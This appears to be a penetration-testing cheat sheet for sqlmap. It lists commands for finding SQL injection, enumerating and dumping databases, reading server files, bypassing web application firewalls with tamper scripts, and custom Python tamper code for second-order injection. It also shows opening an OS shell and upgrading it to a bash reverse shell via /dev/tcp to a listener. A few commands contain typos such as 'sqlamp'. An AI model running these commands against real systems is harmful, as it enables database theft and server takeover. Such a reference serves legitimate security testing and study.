SQL Injection with Sqlmap

SQL injection (SQLi) is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution. This page provides how to inject SQL using sqlmap.

Basic Usage

# GET request
sqlmap -u "http://<target-ip>/?search=test"

Using Burp Suite Request File

We can specify a request file which is downloaded from Burp Suite. In Burp Suite, right-click on the HTTP request header screen, then click Save Item to download the request file. We can use it with SQLmap. Add the "-r" flag as below.

sqlmap -r request.txt

In addition, we can see payloads to be tested in Burp Suite by setting the Burp proxy IP address to the --proxy flag.

# --proxy: Set proxy URL e.g. we can inspect requests in BurpSuite by port 8080 (default port for BurpSuite)
sqlmap -u "https://example.com/?q=test" --proxy http://127.0.0.1:8080

Cheat Sheet

Basic

sqlmap -u "https://example.com/?q=test"

# Specific parameter
sqlmap -u "https://example.com/?q=test" -p q

# Header param injection
sqlmap -u "https://example.com/" --headers "X-Forwarded-For: 1*"

# POST body
sqlmap -u "https://example.com/" --data="username=test&password=test"

# Automate
sqlmap -u https://example.com --crawl 2
# Batch mode
sqlmap -u https://example.com --crawl 2 --batch

# Force SSL/TLS (--force-ssl)
sqlmap -u "https://example.com/?q=test" --force-ssl

Specify DBMS (Database Management System)

We can specify DBMS such as mysql, postgres, sqlite to avoid unnecessary attempts.

sqlmap -u "https://example.com/?q=test" --dbms mysql
sqlmap -u "https://example.com/?q=test" --dbms postgres
sqlmap -u "https://example.com/?q=test" --dbms sqlite

Enumerations

# List databases
# --dbs: List databases
sqlmap -u "https://example.com/?q=test" --dbs

# List tables
# -D: Specific name of the database
# --table: List tables
sqlmap -u "https://example.com/?q=test" -D exampledb --tables

# List columns
# -T: Specific name of the table
# --columns: List columns
sqlmap -u "https://example.com/?q=test" -D exampledb -T users --columns

# Get each column value
# -C: Specific name of the column. We can specify single column or multiple columns
sqlmap -u "https://example.com/?q=test" -D exampledb -T users -C username
sqlmap -u "https://example.com/?q=test" -D exampledb -T users -C username,password

# Get current user and database
sqlmap -u "https://example.com/?q=test" --current-user
sqlamp -u "https://example.com/?q=test" --current-db

Dump Entories

We can dump entories by adding --dump flag.

sqlmap -u "https://example.com/?q=test" --dump
# Specify dbms, database, table
sqlmap -u "https://example.com/?q=test" --dump --dbms mysql -D exampledb -T users

# Dump all entories
sqlmap -u "https://example.com/?q=test" --dump-all

Risk/Level

We can specify the injection risk and level.

• risk

  Risk of tests to perform. Default is 1. Max is 3.

• level

  Level of tests to perform. Default is 1. Max is 5.

sqlmap -u "https://example.com/?q=test" --dump --dbms mysql --risk 3 --level 5

Random Agent

sqlmap -u "https://example.com/?q=test" --random-agent

Fresh Queries

If the database is modified, we can refresh the states by adding --fresh-queries.

# --fresh-queries: new data in tables
sqlmap -u "https://example.com/?q=test" --fresh-queries

Injection Techniques

We can specify the injection technique to test by adding --technique.

# Union attack (U)
sqlmap -u "https://example.com/?q=test" --technique U
# --delay 2: Time delay
sqlmap -u "https://example.com/?q=test" --technique U --delay 2

# Time-based Blind SQLi (T)
sqlmap -u "https://example.com/?q=test" --technique T

# Boolean-based blind injection (B)
sqlmap -u "https://example.com/?q=test" --technique B

Sleep

We can sleep for each injection.

# --time-sec 2: Sleep 2 seconds.
sqlmap -u "https://example.com/?q=test" --time-sec 2

Ignore HTTP response code

We can ignore specific HTTP response (status) code.

# Ignore 401 (Unauthorized)
sqlmap -u "https://example.com/?q=test" --ignore-code 401

# Ignore 500 (Internal Server Error)
sqlmap -u "https://example.com/?q=test" --ignore-code 500

Drop Set-Cookie

We can drop Set-Cookie from HTTP response headers.

sqlmap -u "https://example.com/?q=test" --drop-set-cookie

Second Order Attack

Reference: https://book.hacktricks.xyz/pentesting-web/sql-injection/sqlmap/second-order-injection-sqlmap

If the SQL injection affects another URL, we want to customize the second URL.

Method 1. Simply adding the second request

We can add second-url or second-req flag in sqlmap command. Note that each request file (e.g. req1.txt, req2.txt) is downloaded by clicking "save item" in each request in BurpSuite.

# -p: Specify the parameter where payload will be put
sqlmap -u "https://example.com/profile/change" -p email  --second-url "https://example.com/dashboard"
sqlmap -r req1.txt -p email --second-req req2.txt

Method 2. Tampering

If we could not achieve with the method 1, it’s worth to create a tamper function. For example, create tamper.py with the content below.

#!/usr/bin/env python
import re
import requests
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL

def dependencies():
    pass

def change_profile(payload):
    proxies = {'http':'http://127.0.0.1:8080'}
    cookies = {"ExampleToken": "abcdef...xyz"}

    params = {"username":"tester", "email":payload}
    url = "https://example.com/profile/change"
    req = requests.post(url, data=params, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)
        # If we need to send json param, use `json` attribute instead of `data`.

    url = "https://example.com/dashboard"
    req = requests.get(url, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)

def tamper(payload, **kwargs):
    headers = kwargs.get("headers", {})
    change_profile(payload)
    return payload

By setting the proxy to http://127.0.0.1:8080, we can see the requests and the responses in BurpSuite. After creating, run sqlmap as below.

# Create this file in current directory to avoid error when running sqlmap with tamper
touch __init__.py

sqlmap --tamper tamper.py -r req1.txt -p email --second-req req2.txt --proxy http://127.0.0.1:8080

Integrate with Other Commands

We can set a dynamic value to the parameter by including another command such as curl as follow:

sqlmap -u """https://example.com/?q=test&token=`curl https://api.example.com/auth -X POST -d "username=admin&password=admin" | awk -F '"' '{print$12}'`"""

Web Shell

Add option "--os-shell" to interact with web shell.

sqlmap -u "http://<target-ip>" --cookie="value=*" --os-shell

After activating, you may want to upgrade to the full functional shell. You can do that using reverse shell.

In your local machine,

nc -lvnp 4444

Then execute the following command in web shell.

os-shell> bash -c 'bash -i >& /dev/tcp/<your-local-ip>/4444 0>&1'

Read Files

# --batch: never ask for user input, use the default behavior
sqlmap -r request.txt --file-read "/var/www/html/index.php" --time-sec 10 --batch
sqlmap -r request.txt --file-read "/var/www/<subdomain>/index.php" --time-sec 10 --batch

sqlmap -u "http://<target-ip>/?q=test" --file-read "var/www/html/index.php" --time-sec 10 --batch

Tampering

The sqlmap can be tampered by custom python script e.g. tamper.py or the default library. To list all tampers, run the following command.

sqlmap --list-tampers

WAF (Web Application Firewall) Bypass

This post explains details for what each module works.

# General
sqlmap -r request.txt --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,escapequotes,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

# MSSQL
sqlmap -r request.txt --tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

# MySQL
sqlamp -r request.txt --tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

Custom tamper modules (Base64 encode)

We can also create our custom modules. For instance, we create "tamper.py".

#!/usr/bin/python3
from lib.core.convert import encodeBase64
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL

def dependencies():
    pass

def tamper(payload, **kwargs):
    payload = encodeBase64("%s" % payload, binary=False)
    return payload

Then execute sqlmap.

# The tamper is a module, so we need to create __init__.py in the current directory.
touch __init__.py
sqlmap -u "https://example.com/" --cookie "session=*" --tamper=tamper.py

Multiple Requests

#!/usr/bin/python
import requests
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL

address = "http://vulnerable.com"
password = "test"

def dependencies():
    pass

def create_account(payload):
    with requests.Session() as s:
        data = {"username": payload, "password": password}
        resp = s.post(f"{address}/signup", data=data)

def login(payload):
    with requests.Session() as s:
        data = {"username": payload, "password": password}
        resp = s.post(f"{address}/login", data=data)
        sessid = s.cookies.get("session", None)
    return "session={}".format(sessid)


def tamper(payload, **kwargs):
    headers = kwargs.get("headers", {})
    create_account(payload)
    headers["Cookie"] = login(payload)
    return payload

Then run the sqlmap with the tamper option.

sqlmap --tamper tamper.py --url http://vulnerable.com/signup --data "username=admin&password=test" --second-url "http://vulnerable.com/post" --no-cast